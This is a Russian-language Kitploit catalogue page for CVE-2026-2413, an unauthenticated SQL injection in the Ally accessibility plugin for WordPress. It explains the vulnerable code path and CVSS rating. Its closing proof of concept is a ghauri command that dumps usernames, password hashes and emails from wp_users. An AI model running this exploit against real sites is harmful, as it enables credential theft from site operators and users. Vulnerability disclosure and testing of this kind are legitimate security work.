Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-2413 — Ally – Веб-доступность и удобство использования <= 4.0.3 - Неаутентифицированная SQL-инъекция через путь URL | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2026-2413
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubrandomrobbiebf/cve-2026-2413

CVE-2026-2413

Ally – Веб-доступность и удобство использования <= 4.0.3 - Неаутентифицированная SQL-инъекция через путь URL

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-2413

Ally – Web Accessibility & Usability <= 4.0.3 - Неаутентифицированная SQL-инъекция через путь URL

Описание

Плагин Ally – Web Accessibility & Usability для WordPress уязвим к SQL-инъекции через путь URL во всех версиях до 4.0.3 включительно. Это связано с недостаточным экранированием предоставленного пользователем параметра URL в методе get_global_remediations(), где он напрямую конкатенируется в SQL-выражение JOIN без надлежащей санации для SQL-контекста. Хотя esc_url_raw() применяется для безопасности URL, он не предотвращает внедрение SQL-метасимволов (одинарных кавычек, круглых скобок). Это позволяет неаутентифицированным атакующим добавлять дополнительные SQL-запросы в уже существующие запросы, которые можно использовать для извлечения конфиденциальной информации из базы данных с помощью техник time-based blind SQL-инъекции. Модуль Remediation должен быть активен, для чего требуется, чтобы плагин был подключён к учётной записи Elementor.

Детали

  • Тип: плагин
  • Slug: pojo-accessibility
  • Затронутая версия:
  • Оценка CVSS: 7.5
  • Рейтинг CVSS: Высокий
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2026-2413

POC

root@kitploit:~
ghauri -u "http://localhost:9001/x*" --technique=E --dbms=mysql --batch --ignore-code 404 --skip-urlencode --prefix="'" --suffix="OR'" -D wordpress -T wp_users -C user_login,user_pass,user_email --dump
Скачать инструмент